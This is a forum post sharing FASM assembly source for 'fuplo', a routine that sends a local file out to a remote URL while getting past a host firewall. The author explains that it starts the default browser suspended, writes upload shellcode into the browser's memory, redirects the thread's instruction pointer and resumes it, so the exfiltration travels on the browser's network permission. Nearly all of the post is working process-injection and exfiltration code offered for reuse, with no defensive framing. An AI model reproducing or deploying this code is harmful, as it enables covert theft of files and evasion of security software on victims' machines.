http://www.rohitab.com/discuss/topic/31151-fasmcc-fuplo-file-uploading-and-simple-firewall-bypass/
Hello.
I wrote this for my friend who reads this forum. The code isn't very clear (not commented, because I wrote it very fast (in one night (~10h))) 
The only exception is utils.inc, which I ripped from my other project. Anyway I decided to show off this code, because you probably find it useful 
The actual code is written in FASM and it compiles to .obj-file. Object file is very similar to .DLL, but it's in linkable format so you can use it with HLLs. The source code and simple example how to use it in C++ is below (compiled .obj and Dev-C++ project file in attachment).
Method I use for firewall bypass is pretty simple and effective (not the scriptkiddish registry modification trick...) fuplo(char* szUrl, char* szFile) function in fuplo.obj first resolves default browser from registry (HKEY_CLASSES_ROOT\HTTP\shell\open\command) and uses CreateProcess with CREATE_SUSPENDED-flag to open the browser. Then, by using VirtualAllocEx and WriteProcessMemory it writes code that is used to uploading to address space of the browser. Browser executes the code and uploads the specified file -> horray!
So the method relies on that firewall has given required privileges to browser to "access internet" I still want to say that this method is not however completely stealth, because firewall software can hook function calls to CreateProcess and WriteProcessMemory and notify user of suspicious behavior.
fuplo.ASM (im sorry about ugly indent - i used bad IDE 
)
format MS COFF;PE GUI 4.0
include 'win32a.inc'
include 'api/wsock32.inc'
include 'defs.inc'
public fuplo as '_fuplo'
section '.text' code readable executable
..inject:
call @f
@@:
; pushz 'kernel32.dll'
; call LocateModule;
; pushz 'Sleep'
; push eax
; call GetProc
; mov ebx, eax
;@@: push 1000
; call ebx
; jmp @b
pushz 'kernel32.dll'
call LocateModule
mov ebx, eax ; base of kernel in ebx
pop eax
add eax, ..endofinject-..inject-5
push eax
mov edi, eax
mov al, 0
or ecx, -1
repnz scasb
push edi
call upload
pushz 'ExitProcess'
push ebx
call GetProc
push 0
call eax
proc upload szFile:DWORD, szUrl:DWORD
local hKernel32:DWORD
local hUser32:DWORD
local szHost:DWORD
local szPath:DWORD
local dwFileNameLen:DWORD
local szShortName:DWORD
local dwRequestLen:DWORD
local lpRequest:DWORD
local hFile:DWORD
local dwRead:DWORD
local dwFileSize:DWORD
local szRequest:DWORD
local lpLocalAlloc:DWORD
local wsa:WSADATA
local dest:sockaddr_in
local fdSock:DWORD
xor eax, eax
pushad
pushz 'user32.dll'
pushz 'LoadLibraryA'
push ebx
call GetProc
mov esi, eax
call eax
mov [hUser32], eax
pushz 'WS2_32.dll'
call esi
test eax, eax
je .Exit
mov [hKernel32], ebx
mov ebx, eax
lea eax, [wsa]
push eax
push 101h
pushz 'WSAStartup'
push ebx
call GetProc
call eax
test eax, eax
jnz .Exit
; parsaa
mov [dwRequestLen], 0
mov edi, [szUrl]
cmp dword [edi], 'http'
jnz .wwwcheck
add edi, 7; http://
.wwwcheck: cmp dword [edi], 'www.'
jnz @f
add edi, 4
@@: mov esi, edi
mov al, '/'
mov ecx, 60
repnz scasb
jnz .Exit2; invalid url
sub edi, esi
add [dwRequestLen], edi
dec [dwRequestLen]
push edi
push edi
push LMEM_FIXED
pushz 'LocalAlloc'
push [hKernel32]
call GetProc
mov [lpLocalAlloc], eax
call eax
pop ecx
mov edi, eax
mov [szHost], eax
push eax
rep movsb
mov byte [edi-1], 0
dec esi
mov edi, esi
mov al, 0
mov ecx, 0FFh
repnz scasb
jnz .Exit2
sub edi, esi
add [dwRequestLen], edi
dec [dwRequestLen]
push edi
push edi
push LMEM_FIXED
call [lpLocalAlloc]
pop ecx
mov edi, eax
mov [szPath], eax
rep movsb
pushz 'gethostbyname'
push ebx
call GetProc
call eax
test eax, eax
je .Exit2
mov eax, [eax+hostent.h_addr_list]
mov eax, [eax]
mov eax, [eax]
mov [dest+sockaddr_in.sin_addr], eax
add [dwRequestLen], .FormatEnd-.FormatStart-6
add [dwRequestLen], 3; PANIXPANIC PANIC P�Y ATTENTI�N T� TIZ
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ
push [szFile]
pushz 'CreateFileA'
push [hKernel32]
call GetProc
call eax
test eax, eax
je .Exit
mov [hFile], eax
push NULL
push eax
pushz 'GetFileSize'
push [hKernel32]
call GetProc
call eax
mov [dwFileSize], eax
add [dwRequestLen], eax
mov edi, [szFile]
xor al, al
or ecx, -1
repnz scasb
lea esi, [edi-2]
std
@@: lodsb
cmp esi, [szFile]
je .ShortFN
cmp al, '\'
jnz @b
@@: inc esi
inc esi
.ShortFN: cld
mov [szShortName], esi
sub edi, esi
dec edi
mov [dwFileNameLen], edi
push PAGE_READWRITE
push MEM_COMMIT
push [dwRequestLen]
push NULL
pushz 'VirtualAlloc'
push [hKernel32]
call GetProc
call eax
mov [lpRequest], eax
push [szShortName]
push [dwFileSize]
add dword [esp], .FormatEnd-.ContentStart-3; null-terminator + %s
mov eax, [dwFileNameLen]
add [esp], eax
push [szHost]
push [szPath]
call .FormatEnd
.FormatStart: db "POST %s HTTP/1.1",0Dh,0Ah
db "Host: %s",0Dh,0Ah
db "User-Agent: fuplo",0Dh,0Ah
db 'Content-Type: multipart/form-data; boundary="=_vw0.98992842109405d_="',0Dh,0Ah
db "Content-Length: %ld",0Dh,0Ah,0Dh,0Ah
.ContentStart db "--=_vw0.98992842109405d_=",0Dh,0Ah
db 'Content-Disposition: form-data; name="upf"; filename="%s"',0Dh,0Ah,0Dh,0Ah,0
.EndBoundary: db 0Dh,0Ah,"--=_vw0.98992842109405d_=--",0Dh,0Ah
.FormatEnd: push [lpRequest]
pushz 'wsprintfA'
push [hUser32]
call GetProc
call eax
add esp, 4 * 6
mov edi, [lpRequest]
add edi, eax
add eax, .FormatEnd-.EndBoundary
mov [dwRequestLen], eax
push [szHost]
pushz 'LocalFree'
push [hKernel32]
call GetProc
mov esi, eax
call eax
push [szPath]
call esi
push NULL
lea eax, [dwRead]
push eax
push [dwFileSize]
push edi
push [hFile]
pushz 'ReadFile'
push [hKernel32]
call GetProc
call eax
mov esi, eax
push [hFile]
pushz 'CloseHandle'
push [hKernel32]
call GetProc
call eax
test esi, esi
je .Exit3
mov eax, [dwRead]
add [dwRequestLen], eax
add edi, [dwFileSize]
call @f
@@: pop esi
add esi, .EndBoundary - @b
mov ecx, .FormatEnd-.EndBoundary
rep movsb
push 0
push SOCK_STREAM
push PF_INET
pushz 'socket'
push ebx
call GetProc
call eax
cmp eax, -1
je .Exit3
mov [fdSock], eax
mov [dest+sockaddr_in.sin_family], AF_INET
mov [dest+sockaddr_in.sin_port], 5000h
mov ecx, sizeof.sockaddr_in.sin_zero
lea edi, [dest+sockaddr_in.sin_zero]
xor al, al
rep stosb
push sizeof.sockaddr_in
lea eax, [dest]
push eax
push [fdSock]
pushz 'connect'
push ebx
call GetProc
call eax
cmp eax, -1
je .Exit3
pushz 'send'
push ebx
call GetProc
mov esi, eax
mov edi, [lpRequest]
push MEM_DECOMMIT
push [dwRequestLen]
@@: push 0
push [dwRequestLen]
push edi
push [fdSock]
call esi
add edi, eax
sub [dwRequestLen], eax
jnz @b
.Exit3: push [lpRequest]
pushz 'VirtualFree'
push [hKernel32]
call GetProc
call eax
push [fdSock]
pushz 'closesocket'
push ebx
call GetProc
call eax
;pushz 'Sleep'
;push [hKernel32]
;call GetProc
;push 1000
;call eax
.Exit2: pushz 'WSACleanup'
push ebx
call GetProc
call eax
.Exit: popad
ret
endp
include 'utils.inc'
label szGivenUrl BYTE
..endofinject:
proc fuplo szUrl:DWORD, szFile:DWORD
xor eax, eax
pushad
local hKernel32:DWORD
local hAdvapi32:DWORD
local szBrowserPath:DWORD
local dwUrlLen:DWORD
local dwFilenameLen:DWORD
mov edi, [szUrl]
or ecx, -1
xor al, al
repnz scasb
neg ecx
sub ecx, 1;2
mov [dwUrlLen], ecx
mov edi, [szFile]
or ecx, -1
xor al, al
repnz scasb
neg ecx
sub ecx, 1
mov [dwFilenameLen], ecx
pushz 'kernel32.dll'
call LocateModule
mov [hKernel32], eax
pushz 'advapi32.dll'
pushz 'LoadLibraryA'
push eax
call GetProc
call eax
mov [hAdvapi32], eax
_ResolveBrowser:
local hHttpKey:DWORD
local lpKeyData:DWORD
local dwCrap:DWORD
mov ebx, eax
pushz 'RegOpenKeyExA'
push eax
call GetProc
lea edx, [hHttpKey]
push edx
push KEY_QUERY_VALUE
push 0
pushz 'HTTP\shell\open\command'
push HKEY_CLASSES_ROOT
call eax
test eax, eax
jnz _Exit
lea edx, [dwCrap]
push edx
push NULL
push NULL
push NULL
push NULL
push [hHttpKey]
pushz 'RegQueryValueExA'
push ebx
call GetProc
mov edi, eax
call eax
push [dwCrap]
push LMEM_FIXED
pushz 'LocalAlloc'
push [hKernel32]
call GetProc
call eax
mov [lpKeyData], eax
mov esi, eax
lea edx, [dwCrap]
push edx
push eax
push 0
push NULL
push NULL
push [hHttpKey]
call edi
push [hHttpKey]
pushz 'RegCloseKey'
push ebx
call GetProc
call eax
mov ebx, [hKernel32]
_ParseKeyData:
mov [szBrowserPath], esi
lodsb
cmp al, '"'
jnz @f
inc [szBrowserPath]
jmp .SearchEnd
@@: mov al, ' '
.SearchEnd: mov edi, esi
@@: scasb
jnz @b
mov byte [edi-1], 0
_CreateProcess:
local pi:PROCESS_INFORMATION
local si:STARTUPINFO
mov ecx, sizeof.PROCESS_INFORMATION
lea edi, [pi]
push edi
xor al, al
rep stosb
mov ecx, sizeof.STARTUPINFO
lea edi, [si]
push edi
push edi
rep stosb
pushz 'GetStartupInfoA'
push ebx
call GetProc
call eax
push NULL
push NULL
push CREATE_SUSPENDED
push FALSE
push NULL
push NULL
push NULL
push [szBrowserPath]
pushz 'CreateProcessA'
push ebx
call GetProc
call eax
test eax, eax
je _Exit
.HijackProcess:
local lpInjection:DWORD
local ctx:CONTEXT
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
mov eax, ..endofinject-..inject
add eax, [dwUrlLen]
add eax, [dwFilenameLen]
push eax
push NULL
push dword [pi+PROCESS_INFORMATION.hProcess]
pushz 'VirtualAllocEx'
push ebx
call GetProc
call eax
mov [lpInjection], eax
lea edx, [ctx]
push edx
mov [edx+CONTEXT.ContextFlags], CONTEXT_FULL
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'GetThreadContext'
push ebx
call GetProc
call eax
mov edi, [lpInjection]
lea eax, [dwCrap]
push eax
push ..endofinject-..inject
push ..inject
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
pushz 'WriteProcessMemory'
push ebx
call GetProc
mov esi, eax
mov [ctx+CONTEXT.Eip], edi
call eax
add edi, ..endofinject-..inject
lea eax, [dwCrap]
push eax
push [dwUrlLen]
push [szUrl]
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
call esi
add edi, [dwUrlLen]
lea eax, [dwCrap]
push eax
push [dwFilenameLen]
push [szFile]
push edi
push dword [pi+PROCESS_INFORMATION.hProcess]
call esi
lea edx, [ctx]
push edx
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'SetThreadContext'
push ebx
call GetProc
call eax
push dword [pi+PROCESS_INFORMATION.hThread]
pushz 'ResumeThread'
push ebx
call GetProc
call eax
mov [esp+_PUSHAD.Pushad_eax], 1
_Exit: popad
ret
endp